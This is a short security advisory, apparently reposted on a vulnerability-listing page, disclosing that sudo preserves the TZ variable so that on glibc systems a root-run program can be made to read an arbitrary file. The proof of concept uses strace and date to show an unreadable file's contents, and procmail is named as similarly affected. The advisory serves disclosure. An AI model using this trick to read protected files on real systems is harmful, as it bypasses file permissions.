Abusing TZ for fun (and little profit)

2014.10.17

Credit: Jakub Wilk

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

 By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC:
$ echo moo > tz
$ chmod 0 tz
$ cat tz
cat: tz: Permission denied
$ TZ=$PWD/tz sudo -u root strace -e read date
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512
read(3, "moo\n", 4096) = 4
read(3, "", 4096) = 0
Wed Oct 15 20:42:42 2014
+++ exited with 0 +++
Procmail is another program that recklessly whitelists TZ[2].
[1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189
[2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13
--
Jakub Wilk

References:

https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189

https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Abusing TZ for fun (and little profit)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.